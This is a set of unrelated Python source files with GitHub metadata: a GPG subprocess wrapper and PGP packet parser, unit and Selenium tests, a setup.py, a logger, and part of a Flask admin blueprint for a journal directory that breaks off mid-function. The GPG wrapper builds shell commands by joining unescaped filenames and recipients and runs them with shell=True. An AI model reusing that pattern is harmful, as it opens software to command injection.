def uid(self, args):
self.pk["uids"].append(args[9])
class EncryptedMessage:
"""Handle a --encrypt command"""
def __init__(self):
self.data = ""
def BEGIN_ENCRYPTION(self, value):
pass
def END_ENCRYPTION(self, value):
pass
class GPGSubprocess:
def __init__(self, gpg_binary=None, keyring=None):
"""Initialize an object instance. Options are:
gpg_binary -- full pathname for GPG binary. If not supplied,
the current value of PATH will be searched, falling back to the
DEFAULT_PATH class variable if PATH isn't available.
keyring -- full pathname to the public keyring to use in place of
the default "~/.gnupg/pubring.gpg".
"""
# If needed, look for the gpg binary along the path
if gpg_binary is None or gpg_binary == "":
path = DEFAULT_PATH
if "PATH" in os.environ:
temppath = os.environ["PATH"]
path.extend(temppath.split(os.pathsep))
# else:
# path = self.DEFAULT_PATH
for pathdir in path:
pathdir = os.path.expandvars(pathdir)
fullname = os.path.join(pathdir, "gpg")
if self._check_file(fullname):
gpg_binary = fullname
break
if self._check_file(fullname + ".exe"):
gpg_binary = fullname + ".exe"
break
# gpg2 support
fullname += "2"
if self._check_file(fullname):
gpg_binary = fullname
break
if self._check_file(fullname + ".exe"):
gpg_binary = fullname + ".exe"
break
else:
raise ValueError(
_("Couldn't find 'gpg' binary on path %s.") % repr(path)
)
self.gpg_binary = '"' + gpg_binary + '"'
self.keyring = keyring
def _check_file(self, filename):
if os.path.isfile(filename) and os.access(filename, os.X_OK):
return True
return False
def _open_subprocess(self, *args):
"""
Internal method: open a pipe to a GPG subprocess and return
the file objects for communicating with it.
"""
cmd = [self.gpg_binary, "--status-fd 2"]
if self.keyring:
cmd.append('--keyring "%s" --no-default-keyring' % self.keyring)
cmd.extend(args)
cmd = " ".join(cmd)
# print cmd
shell = True
if os.name == "nt":
shell = False
# From: http://www.py2exe.org/index.cgi/Py2ExeSubprocessInteractions
creationflags = 0
try:
creationflags = win32process.CREATE_NO_WINDOW
except NameError:
pass
process = subprocess.Popen(
cmd,
shell=shell,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
creationflags=creationflags,
)
# child_stdout, child_stdin, child_stderr = #popen2.popen3(cmd)
# return child_stdout, child_stdin, child_stderr
# print process.stderr
return process.stdout, process.stdin, process.stderr
def _read_response(self, child_stdout, response):
"""
Internal method: reads all the output from GPG, taking notice
only of lines that begin with the magic [GNUPG:] prefix.
Calls methods on the response object for each valid token found,
with the arg being the remainder of the status line.
"""
while 1:
line = child_stdout.readline()
# print line
if line == "":
break
line = line.rstrip()
if line[0:9] == "[GNUPG:] ":
# Chop off the prefix
line = line[9:]
L = line.split(None, 1)
keyword = L[0]
if len(L) > 1:
value = L[1]
else:
value = ""
getattr(response, keyword)(value)
def _handle_gigo(self, args, file, result):
"""
Handle a basic data call - pass data to GPG, handle the output
including status information. Garbage In, Garbage Out :)
"""
child_stdout, child_stdin, child_stderr = self._open_subprocess(*args)
# Copy the file to the GPG subprocess
while 1:
data = file.read(1024)
if data == "":
break
child_stdin.write(data)
child_stdin.close()
# Get the response information
self._read_response(child_stderr, result)
# Read the contents of the file from GPG's stdout
result.data = ""
while 1:
data = child_stdout.read(1024)
if data == "":
break
result.data = result.data + data
return result
#
# SIGNATURE VERIFICATION METHODS
#
def verify(self, data):
"""
Verify the signature on the contents of the string 'data'
"""
fileobj = StringIO.StringIO(data)
return self.verify_file(fileobj)
def verify_file(self, file):
"""
Verify the signature on the contents of the file-like object 'file'
"""
sig = Signature()
self._handle_gigo(["--verify -"], file, sig)
return sig
def verify_file_detached(self, filename, sigtext):
"""
filename - local name of file to check signature for
sigtext - text of the PGP signature
"""
sig = Signature()
sigfile = StringIO.StringIO(sigtext)
self._handle_gigo(['--verify - "%s"' % filename], sigfile, sig)
return sig
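    # Usage sketch (assumes a gpg binary on the search path and that the
    # signer's public key has already been imported into the keyring):
    #
    #     gpg = GPGSubprocess()
    #     sig = gpg.verify(open("message.asc").read())
    #     if sig.is_valid():
    #         print("good signature from", sig.username)
    #     else:
    #         print("verification failed:", sig.error)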
#
# KEY MANAGEMENT
#
def import_key(self, key_data):
"""import the key_data into our keyring"""
child_stdout, child_stdin, child_stderr = self._open_subprocess("--import")
child_stdin.write(key_data)
child_stdin.close()
# Get the response information
result = ImportResult()
self._read_response(child_stderr, result)
return result
def list_keys(self):
"""list the keys currently in the keyring"""
child_stdout, child_stdin, child_stderr = self._open_subprocess(
"--list-keys --with-colons"
)
child_stdin.close()
# TODO: there might be some status thingumy here I should handle...
# Get the response information
result = ListResult()
valid_keywords = "pub uid".split()
while 1:
line = child_stdout.readline()
if not line:
break
L = line.strip().split(":")
if not L:
continue
keyword = L[0]
if keyword in valid_keywords:
getattr(result, keyword)(L)
return result
#
# ENCRYPTING DATA
#
def encrypt_file(self, file, recipients):
'''Encrypt the message read from the file-like object "file"'''
args = ["--encrypt --armor"]
for recipient in recipients:
args.append("--recipient %s" % recipient)
result = EncryptedMessage()
self._handle_gigo(args, file, result)
return result
def encrypt(self, data, recipients):
'''Encrypt the message contained in the string "data"'''
fileobj = StringIO.StringIO(data)
return self.encrypt_file(fileobj, recipients)
# Not yet implemented, because I don't need these methods
# The methods certainly don't have all the parameters they'd need.
def sign(self, data):
'''Sign the contents of the string "data"'''
pass
def sign_file(self, file):
'''Sign the contents of the file-like object "file"'''
pass
def decrypt_file(self, file):
'''Decrypt the message read from the file-like object "file"'''
pass
def decrypt(self, data):
'''Decrypt the message contained in the string "data"'''
pass
def print_hex(binary_data):
    """
    Takes a binary string as input and returns it formatted as hex bytes.
    Returning the string (instead of printing it) lets callers embed the
    result in their own print() calls, as decode_tag() does below.
    """
    return " ".join("%.2x" % ord(byte) for byte in binary_data)
def decode(filename):
"""
Decodes data elements from a given PGP file name.
"""
    if filename is None:
return []
if filename.endswith(".asc"):
return decode_asc(filename)
else:
return decode_sig(filename)
def decode_sig(filename):
"""
Decodes data elements from a binary (.sig) PGP file.
"""
filehandle = open(filename)
binstr = filehandle.read()
filehandle.close()
return decode_data(binstr)
def decode_asc(filename):
"""
Decodes data elements from a base 64 encoded (.asc) PGP file.
"""
filehandle = open(filename)
lines = filehandle.readlines()
filehandle.close()
return decode_lines(lines)
def decode_lines(lines):
"""
Decodes header from PGP ASCII.
"""
text = ""
add = False
for line in lines:
if line.strip().startswith("-----END PGP "):
add = False
if add and line.strip() != "":
text += line
# if line.strip().startswith("-----BEGIN PGP SIGNATURE-----"):
if line.strip() == "":
add = True
binary_data = base64.standard_b64decode(text)
return decode_data(binary_data)
def decode_data(binary_data):
"""
Decodes data packets from a PGP formatted string.
"""
pktlist = GPGFile()
while len(binary_data) > 3:
packet = decode_header(binary_data)
pktlist.append(packet)
binary_data = binary_data[packet["size"] + packet["header_size"] :]
# print len(binary_data)
return pktlist
def decode_header(binary_data):
"""
Decodes the header of a PGP formatted string.
"""
results = {}
packet_header = ord(binary_data[0])
binary_data = binary_data[1:]
format = (packet_header & 0x40) >> 6
if format == 1:
# new format packet
# print "not implemented, new packet format"
results["content_tag"] = packet_header & 0x1F
results["format"] = "New"
# print "new", len(binary_data)
# results['header_size'] = 0
octet1 = ord(binary_data[0])
if octet1 < 192:
results["size"] = ord(binary_data[0])
binary_data = binary_data[1:]
elif 192 <= octet1 <= 223:
results["size"] = ((ord(binary_data[0]) - 192) << 8) + ord(binary_data[1])
binary_data = binary_data[2:]
elif octet1 == 255:
results["size"] = (
(ord(binary_data[0]) << 24)
| (ord(binary_data[1]) << 16)
| (ord(binary_data[2])) << 8
| ord(binary_data[3])
)
binary_data = binary_data[4:]
else:
print("not implemented, header length", octet1)
return results
else:
# old format
results["format"] = "Old"
results["content_tag"] = (packet_header >> 2) & 0x0F
length_type = packet_header & 0x03
# print length_type
if length_type < 3:
length_octets = pow(2, length_type)
results["header_size"] = length_octets + 1
# print length_octets
if length_octets == 1:
results["size"] = ord(binary_data[0])
binary_data = binary_data[1:]
elif length_octets == 2:
results["size"] = (ord(binary_data[0]) << 8) + ord(binary_data[1])
binary_data = binary_data[2:]
elif length_octets == 4:
results["size"] = (
(ord(binary_data[0]) << 24)
+ (ord(binary_data[1]) << 16)
+ (ord(binary_data[2]) << 8)
+ ord(binary_data[3])
)
binary_data = binary_data[4:]
else:
print("not implemented, header length", length_octets)
return results
elif length_type == 3:
print("not implemented, length type", length_type)
return results
return decode_tag(results, binary_data[: results["size"]])
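# Worked example of the old-format header math above: a header byte of 0x99
# (0b10011001) has the format bit (0x40) clear, so this is an old-format packet;
# content_tag = (0x99 >> 2) & 0x0F = 6 (a public key packet), and
# length_type = 0x99 & 0x03 = 1, so two length octets follow the header byte.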
def decode_tag(results, binary_data):
"""
Decodes packet types from a PGP string.
"""
if results["content_tag"] == 2:
# signature packet
results["type"] = "Signature Packet"
sig_version = ord(binary_data[0])
if sig_version == 3:
mat_length = ord(binary_data[1])
sig_type = ord(binary_data[2])
print("sig type:", sig_type)
create_time = binary_data[3:7]
print("create time:", print_hex(create_time))
key_id = binary_data[7:15]
print("key id:", print_hex(key_id))
key_algo = ord(binary_data[15])
hash_algo = ord(binary_data[16])
print("key algo: %x" % key_algo)
print("hash algo: %x" % hash_algo)
signed_hash = binary_data[17:19]
print("sig start:", print_hex(signed_hash))
signature = binary_data[19:]
# print len(signature)
r = signature[:20]
s = signature[20:]
print("r:", print_hex(signature[:20]))
print("s:", print_hex(signature[20:]))
elif results["content_tag"] == 6:
results["type"] = "Public Key Packet"
results["key.version"] = ord(binary_data[0])
if results["key.version"] == 4:
create_time = binary_data[1:5]
# print "create time:", print_hex(create_time)
# days = binary_data[5:7]
# print "valid days:", (ord(days[0]) << 8) + ord(days[1])
results["key.algo"] = ord(binary_data[5])
elif results["key.version"] == 3:
# create_time = binary_data[1:5]
# print "create time:", print_hex(create_time)
# days = binary_data[5:7]
# print "valid days:", (ord(days[0]) << 8) + ord(days[1])
# results["key.algo"] = ord(binary_data[6])
print("not implemented, key version", results["key.version"])
else:
print("not implemented, key version", results["key.version"])
elif results["content_tag"] == 13:
results["type"] = "User ID"
user = ""
for char in binary_data:
user += chr(ord(char))
results["user.value"] = user
else:
pass
# print "not yet implemented, tag", results['content_tag']
return results
# print "\nAll data:", print_hex(binary_data)
class GPGFile(list):
"""
    Class to manage PGP packet data.
"""
def __init__(self, filename=None, url=None):
self.url = url
self.filename = filename
self.extend(decode(self.filename))
def get_user_ids(self):
"""
Returns a list of the display names for keys.
"""
idlist = []
for item in self:
if item["content_tag"] == 13:
idlist.append(item["user.value"])
return idlist
##def binary2int(bin):
## i = 0
## total = 0
## for j in range(len(bin)):
## total += ord(bin[j]) * pow(2,i)
## i += 8
## return total
# if __name__=="__main__":
# for item in decode_asc("mcnab.asc"):
# print item
# print get_user_id("mcnab.asc")
##
if __name__ == "__main__":
## import sys
## if len(sys.argv) == 1:
## print 'Usage: GPG.py <signed file>'
## sys.exit()
##
obj = GPGSubprocess()
## file = open(sys.argv[1], 'rb')
## sig = obj.verify_file( file )
## print sig.__dict__
| {
"content_hash": "7e82ff79176bbbee70c0f0eae27ca893",
"timestamp": "",
"source": "github",
"line_count": 818,
"max_line_length": 103,
"avg_line_length": 29.586797066014668,
"alnum_prop": 0.54640112387406,
"repo_name": "metalink-dev/pymetalink",
"id": "1623d1003b090bf095345d20f6d9ea5fbc6d424c",
"size": "24226",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "metalink/GPG.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "745"
},
{
"name": "HTML",
"bytes": "282"
},
{
"name": "Python",
"bytes": "200635"
},
{
"name": "Shell",
"bytes": "81"
}
],
"symlink_target": ""
} |
import mock
from cloudferry.lib.os.compute import instances
from tests import test
class LiveMigrationTestCase(test.TestCase):
def test_raises_error_for_unknown_migration_tool(self):
nova_client = mock.Mock()
config = mock.Mock()
config.migrate.incloud_live_migration = "not-existing-migration-type"
vm_id = "some-id"
dest_host = "some-host"
self.assertRaises(NotImplementedError,
instances.incloud_live_migrate,
nova_client, config, vm_id, dest_host)
def test_runs_migration_for_nova(self):
nova_client = mock.Mock()
config = mock.Mock()
config.migrate.incloud_live_migration = "nova"
vm_id = "some-id"
dest_host = "dest-host"
instances.incloud_live_migrate(nova_client, config, vm_id, dest_host)
@mock.patch('cloudferry.lib.os.compute.instances.run', mock.MagicMock())
@mock.patch('cloudferry.lib.os.compute.instances.clients',
mock.MagicMock())
def test_runs_migration_for_cobalt(self):
nova_client = mock.Mock()
config = mock.Mock()
config.migrate.incloud_live_migration = "cobalt"
vm_id = "some-id"
dest_host = "dest-host"
instances.incloud_live_migrate(nova_client, config, vm_id, dest_host)
| {
"content_hash": "e88d4a0eeabb9677038cfc30c259f9b2",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 77,
"avg_line_length": 33.5,
"alnum_prop": 0.6268656716417911,
"repo_name": "SVilgelm/CloudFerry",
"id": "1038a57ed4ff786b84f2ade16af7487540f127f8",
"size": "1916",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/lib/os/compute/test_live_migration.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "2615"
},
{
"name": "Python",
"bytes": "1718937"
},
{
"name": "Ruby",
"bytes": "2507"
},
{
"name": "Shell",
"bytes": "11910"
}
],
"symlink_target": ""
} |
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
import unittest, time, re
class Search(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Firefox()
self.driver.implicitly_wait(30)
self.base_url = "http://localhost:8081/"
self.verificationErrors = []
self.accept_next_alert = True
def test_search(self):
driver = self.driver
driver.get(self.base_url + "/php4dvd/")
driver.find_element_by_id("q").clear()
driver.find_element_by_id("q").send_keys("my film")
# Warning: verifyTextPresent may require manual changes
try: self.assertRegexpMatches(driver.find_element_by_css_selector("BODY").text, r"^[\s\S]*$")
except AssertionError as e: self.verificationErrors.append(str(e))
driver.find_element_by_id("q").clear()
driver.find_element_by_id("q").send_keys("jksgkdvlm")
# Warning: verifyTextPresent may require manual changes
try: self.assertRegexpMatches(driver.find_element_by_css_selector("BODY").text, r"^[\s\S]*$")
except AssertionError as e: self.verificationErrors.append(str(e))
def is_element_present(self, how, what):
try: self.driver.find_element(by=how, value=what)
        except NoSuchElementException: return False
return True
def is_alert_present(self):
try: self.driver.switch_to_alert()
        except NoAlertPresentException: return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally: self.accept_next_alert = True
def tearDown(self):
self.driver.quit()
self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
unittest.main()
| {
"content_hash": "0a3c3a03b6f762f2de619aefbb008a7a",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 101,
"avg_line_length": 39.175438596491226,
"alnum_prop": 0.6480071652485445,
"repo_name": "iri6e4ka/test-project",
"id": "139615fa7e5222848067590d01bf3f51609974fd",
"size": "2257",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "php4dvd/search.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5713"
}
],
"symlink_target": ""
} |
import os
from setuptools import find_packages
from setuptools import setup
HERE = os.path.abspath(os.path.dirname(__file__))
README = open(os.path.join(HERE, 'README.rst')).read()
CHANGES = open(os.path.join(HERE, 'CHANGES.rst')).read()
REQUIRES = ('cryptacular',
'docutils',
'dogpile.cache',
'pyramid',
'pyramid_tm',
'sqlalchemy',
'wtforms',
'zope.sqlalchemy')
setup(name='Yait',
version='0.1.0',
description='Yait is an issue tracker.',
long_description='\n\n'.join((README, CHANGES)),
classifiers=(
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Framework :: Pyramid',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP :: WSGI :: Application',
'Topic :: Software Development :: Bug Tracking'
),
author='Damien Baty',
author_email='[email protected]',
url='FIXME',
keywords='web bug issue tracker pyramid',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=REQUIRES,
test_suite='yait.tests',
entry_points='''\
[paste.app_factory]
main = yait.app:make_app
''')
| {
"content_hash": "22c05ceb530c986756b861ca89030eda",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 63,
"avg_line_length": 29.285714285714285,
"alnum_prop": 0.5763066202090592,
"repo_name": "dbaty/Yait",
"id": "e45e56e4bef5238dc71c504c0b4131d9383eb921",
"size": "1435",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "148835"
},
{
"name": "Python",
"bytes": "162796"
}
],
"symlink_target": ""
} |
import pytest
import unittest
from modules.sfp_focsec import sfp_focsec
from sflib import SpiderFoot
from spiderfoot import SpiderFootEvent, SpiderFootTarget
@pytest.mark.usefixtures
class TestModuleIntegrationFocsec(unittest.TestCase):
@unittest.skip("todo")
def test_handleEvent(self):
sf = SpiderFoot(self.default_options)
module = sfp_focsec()
module.setup(sf, dict())
target_value = 'example target value'
target_type = 'IP_ADDRESS'
target = SpiderFootTarget(target_value, target_type)
module.setTarget(target)
event_type = 'ROOT'
event_data = 'example data'
event_module = ''
source_event = ''
evt = SpiderFootEvent(event_type, event_data, event_module, source_event)
result = module.handleEvent(evt)
self.assertIsNone(result)
| {
"content_hash": "2fdcf038359feb97dbcbb91d4ae49457",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 81,
"avg_line_length": 26.9375,
"alnum_prop": 0.6716937354988399,
"repo_name": "smicallef/spiderfoot",
"id": "9b88950a510ce6610d59bead2df952eeae0f843b",
"size": "862",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/integration/modules/test_sfp_focsec.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "9833"
},
{
"name": "Dockerfile",
"bytes": "2779"
},
{
"name": "JavaScript",
"bytes": "34248"
},
{
"name": "Python",
"bytes": "2845553"
},
{
"name": "RobotFramework",
"bytes": "7584"
},
{
"name": "Shell",
"bytes": "1636"
}
],
"symlink_target": ""
} |
import logging
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s: %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',)
logger = logging.getLogger('scanner')
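# Usage sketch (assumes this module is importable as libs.printer, per its
# location in the repository):
#   from libs.printer import logger
#   logger.info('scan started')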
| {
"content_hash": "9f215884c383d59a7aa070f3b19e060e",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 68,
"avg_line_length": 20.181818181818183,
"alnum_prop": 0.5495495495495496,
"repo_name": "gogobirds/Pencil",
"id": "873b2582a50200eab45e61a86b9a0887cf2ff2b4",
"size": "305",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "libs/printer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7487"
}
],
"symlink_target": ""
} |
import json
from flask import Blueprint, request, flash, abort, make_response
from flask import render_template, redirect, url_for
from flask_login import current_user, login_required
from werkzeug.datastructures import MultiDict
from portality import dao
import portality.models as models
from portality import constants
from portality import lock
from portality.background import BackgroundSummary
from portality.bll import DOAJ, exceptions
from portality.bll.exceptions import ArticleMergeConflict, DuplicateArticleException
from portality.core import app
from portality.crosswalks.application_form import ApplicationFormXWalk
from portality.decorators import ssl_required, restrict_to_role, write_required
from portality.forms.application_forms import ApplicationFormFactory, application_statuses
from portality.forms.application_forms import JournalFormFactory
from portality.forms.article_forms import ArticleFormFactory
from portality.lcc import lcc_jstree
from portality.lib.query_filters import remove_search_limits, update_request, not_update_request
from portality.tasks import journal_in_out_doaj, journal_bulk_edit, suggestion_bulk_edit, journal_bulk_delete, \
article_bulk_delete
from portality.ui.messages import Messages
from portality.util import flash_with_url, jsonp, make_json_resp, get_web_json_payload, validate_json
from portality.view.forms import EditorGroupForm, MakeContinuation
from portality.bll.services.query import Query
# ~~Admin:Blueprint~~
blueprint = Blueprint('admin', __name__)
# restrict everything in admin to logged in users with the "admin" role
@blueprint.before_request
def restrict():
return restrict_to_role('admin')
# build an admin page where things can be done
@blueprint.route('/')
@login_required
@ssl_required
def index():
return render_template('admin/index.html', admin_page=True)
@blueprint.route("/journals", methods=["GET"])
@login_required
@ssl_required
def journals():
qs = request.query_string
target = url_for("admin.index")
if qs:
target += "?" + qs.decode()
return redirect(target)
@blueprint.route("/journals", methods=["POST", "DELETE"])
@login_required
@ssl_required
@write_required()
@jsonp
def journals_list():
if request.method == "POST":
try:
query = json.loads(request.values.get("q"))
except:
app.logger.warn("Bad Request at admin/journals: " + str(request.values.get("q")))
abort(400)
# get the total number of journals to be affected
jtotal = models.Journal.hit_count(query, consistent_order=False)
# get the total number of articles to be affected
issns = models.Journal.issns_by_query(query)
atotal = models.Article.count_by_issns(issns)
resp = make_response(json.dumps({"journals" : jtotal, "articles" : atotal}))
resp.mimetype = "application/json"
return resp
elif request.method == "DELETE":
if not current_user.has_role("delete_article"):
abort(401)
try:
query = json.loads(request.data)
except:
app.logger.warn("Bad Request at admin/journals: " + str(request.data))
abort(400)
# get only the query part
query = {"query" : query.get("query")}
models.Journal.delete_selected(query=query, articles=True, snapshot_journals=True, snapshot_articles=True)
resp = make_response(json.dumps({"status" : "success"}))
resp.mimetype = "application/json"
return resp
@blueprint.route("/articles", methods=["POST", "DELETE"])
@login_required
@ssl_required
@write_required()
@jsonp
def articles_list():
if request.method == "POST":
try:
query = json.loads(request.values.get("q"))
except:
            app.logger.warn("Bad Request at admin/articles: " + str(request.values.get("q")))
abort(400)
total = models.Article.hit_count(query, consistent_order=False)
resp = make_response(json.dumps({"total" : total}))
resp.mimetype = "application/json"
return resp
elif request.method == "DELETE":
if not current_user.has_role("delete_article"):
abort(401)
try:
query = json.loads(request.data)
except:
            app.logger.warn("Bad Request at admin/articles: " + str(request.data))
abort(400)
# get only the query part
query = {"query" : query.get("query")}
models.Article.delete_selected(query=query, snapshot=True)
resp = make_response(json.dumps({"status" : "success"}))
resp.mimetype = "application/json"
return resp
@blueprint.route("/delete/article/<article_id>", methods=["POST"])
@login_required
@ssl_required
@write_required()
def article_endpoint(article_id):
if not current_user.has_role("delete_article"):
abort(401)
a = models.Article.pull(article_id)
if a is None:
abort(404)
delete = request.values.get("delete", "false")
if delete != "true":
abort(400)
a.snapshot()
a.delete()
# return a json response
resp = make_response(json.dumps({"success" : True}))
resp.mimetype = "application/json"
return resp
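# Example call (illustrative): POST <admin prefix>/delete/article/<article_id>
# with a form field delete=true; any other value of "delete" returns 400, and
# callers without the delete_article role get 401.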
@blueprint.route("/article/<article_id>", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def article_page(article_id):
if not current_user.has_role("edit_article"):
abort(401)
ap = models.Article.pull(article_id)
if ap is None:
abort(404)
fc = ArticleFormFactory.get_from_context(role="admin", source=ap, user=current_user)
if request.method == "GET":
return fc.render_template()
elif request.method == "POST":
user = current_user._get_current_object()
fc = ArticleFormFactory.get_from_context(role="admin", source=ap, user=user, form_data=request.form)
fc.modify_authors_if_required(request.values)
if fc.validate():
try:
fc.finalise()
except ArticleMergeConflict:
Messages.flash(Messages.ARTICLE_METADATA_MERGE_CONFLICT)
except DuplicateArticleException:
Messages.flash(Messages.ARTICLE_METADATA_UPDATE_CONFLICT)
return fc.render_template()
@blueprint.route("/journal/<journal_id>", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def journal_page(journal_id):
# ~~JournalForm:Page~~
auth_svc = DOAJ.authorisationService()
journal_svc = DOAJ.journalService()
journal, _ = journal_svc.journal(journal_id)
if journal is None:
abort(404)
try:
auth_svc.can_edit_journal(current_user._get_current_object(), journal)
except exceptions.AuthoriseException:
abort(401)
# attempt to get a lock on the object
try:
lockinfo = lock.lock(constants.LOCK_JOURNAL, journal_id, current_user.id)
except lock.Locked as l:
return render_template("admin/journal_locked.html", journal=journal, lock=l.lock)
fc = JournalFormFactory.context("admin")
if request.method == "GET":
job = None
job_id = request.values.get("job")
if job_id is not None and job_id != "":
# ~~-> BackgroundJobs:Model~~
job = models.BackgroundJob.pull(job_id)
# ~~-> BackgroundJobs:Page~~
url = url_for("admin.background_jobs_search") + "?source=" + dao.Facetview2.url_encode_query(dao.Facetview2.make_query(job_id))
Messages.flash_with_url(Messages.ADMIN__WITHDRAW_REINSTATE.format(url=url), "success")
fc.processor(source=journal)
return fc.render_template(lock=lockinfo, job=job, obj=journal, lcc_tree=lcc_jstree)
elif request.method == "POST":
processor = fc.processor(formdata=request.form, source=journal)
if processor.validate():
try:
processor.finalise()
flash('Journal updated.', 'success')
for a in processor.alert:
flash_with_url(a, "success")
return redirect(url_for("admin.journal_page", journal_id=journal.id, _anchor='done'))
except Exception as e:
flash(str(e))
return redirect(url_for("admin.journal_page", journal_id=journal.id, _anchor='cannot_edit'))
else:
return fc.render_template(lock=lockinfo, obj=journal, lcc_tree=lcc_jstree)
######################################################
# Endpoints for reinstating/withdrawing journals from the DOAJ
#
@blueprint.route("/journal/<journal_id>/activate", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def journal_activate(journal_id):
job = journal_in_out_doaj.change_in_doaj([journal_id], True)
return redirect(url_for('.journal_page', journal_id=journal_id, job=job.id))
@blueprint.route("/journal/<journal_id>/deactivate", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def journal_deactivate(journal_id):
job = journal_in_out_doaj.change_in_doaj([journal_id], False)
return redirect(url_for('.journal_page', journal_id=journal_id, job=job.id))
@blueprint.route("/journals/bulk/withdraw", methods=["POST"])
@login_required
@ssl_required
@write_required()
def journals_bulk_withdraw():
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = journal_in_out_doaj.change_by_query(q, False, dry_run=payload.get("dry_run", True))
return make_json_resp(summary.as_dict(), status_code=200)
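# Example request body (the inner query shape is illustrative only):
#   {"selection_query": {"query": {"match_all": {}}}, "dry_run": true}
# With dry_run true (the default here) the task only reports what would change.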
@blueprint.route("/journals/bulk/reinstate", methods=["POST"])
@login_required
@ssl_required
@write_required()
def journals_bulk_reinstate():
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = journal_in_out_doaj.change_by_query(q, True, dry_run=payload.get("dry_run", True))
return make_json_resp(summary.as_dict(), status_code=200)
#
#####################################################################
@blueprint.route("/journal/<journal_id>/continue", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def journal_continue(journal_id):
j = models.Journal.pull(journal_id)
if j is None:
abort(404)
if request.method == "GET":
type = request.values.get("type")
form = MakeContinuation()
form.type.data = type
return render_template("admin/continuation.html", form=form, current=j)
elif request.method == "POST":
form = MakeContinuation(request.form)
if not form.validate():
return render_template('admin/continuation.html', form=form, current=j)
if form.type.data is None:
abort(400)
if form.type.data not in ["replaces", "is_replaced_by"]:
abort(400)
try:
cont = j.make_continuation(form.type.data, eissn=form.eissn.data, pissn=form.pissn.data, title=form.title.data)
except:
abort(400)
flash("The continuation has been created (see below). You may now edit the other metadata associated with it. The original journal has also been updated with this continuation's ISSN(s). Once you are happy with this record, you can publish it to the DOAJ", "success")
return redirect(url_for('.journal_page', journal_id=cont.id))
@blueprint.route("/applications", methods=["GET"])
@login_required
@ssl_required
def suggestions():
fc = ApplicationFormFactory.context("admin")
return render_template("admin/applications.html",
admin_page=True,
application_status_choices=application_statuses(None, fc))
@blueprint.route("/update_requests", methods=["GET"])
@login_required
@ssl_required
def update_requests():
fc = ApplicationFormFactory.context("admin")
return render_template("admin/update_requests.html",
admin_page=True,
application_status_choices=application_statuses(None, fc))
@blueprint.route("/application/<application_id>", methods=["GET", "POST"])
@write_required()
@login_required
@ssl_required
def application(application_id):
auth_svc = DOAJ.authorisationService()
application_svc = DOAJ.applicationService()
ap, _ = application_svc.application(application_id)
if ap is None:
abort(404)
try:
auth_svc.can_edit_application(current_user._get_current_object(), ap)
except exceptions.AuthoriseException:
abort(401)
try:
lockinfo = lock.lock(constants.LOCK_APPLICATION, application_id, current_user.id)
except lock.Locked as l:
return render_template("admin/application_locked.html", application=ap, lock=l.lock)
fc = ApplicationFormFactory.context("admin")
form_diff, current_journal = ApplicationFormXWalk.update_request_diff(ap)
if request.method == "GET":
fc.processor(source=ap)
return fc.render_template(obj=ap, lock=lockinfo, form_diff=form_diff,
current_journal=current_journal, lcc_tree=lcc_jstree)
elif request.method == "POST":
processor = fc.processor(formdata=request.form, source=ap)
if processor.validate():
try:
processor.finalise(current_user._get_current_object())
                # if (processor.form.resettedFields):
                #     text = "Some fields have been reset due to invalid values:"
                #     for f in processor.form.resettedFields:
                #         text += "<br>field: {}, invalid value: {}, new value: {}".format(f["name"], f["data"], f["default"])
                #     flash(text, 'info')
flash('Application updated.', 'success')
for a in processor.alert:
flash_with_url(a, "success")
return redirect(url_for("admin.application", application_id=ap.id, _anchor='done'))
except Exception as e:
flash(str(e))
return redirect(url_for("admin.application", application_id=ap.id, _anchor='cannot_edit'))
else:
return fc.render_template(obj=ap, lock=lockinfo, form_diff=form_diff, current_journal=current_journal, lcc_tree=lcc_jstree)
@blueprint.route("/application_quick_reject/<application_id>", methods=["POST"])
@login_required
@ssl_required
@write_required()
def application_quick_reject(application_id):
# extract the note information from the request
canned_reason = request.values.get("quick_reject", "")
additional_info = request.values.get("quick_reject_details", "")
reasons = []
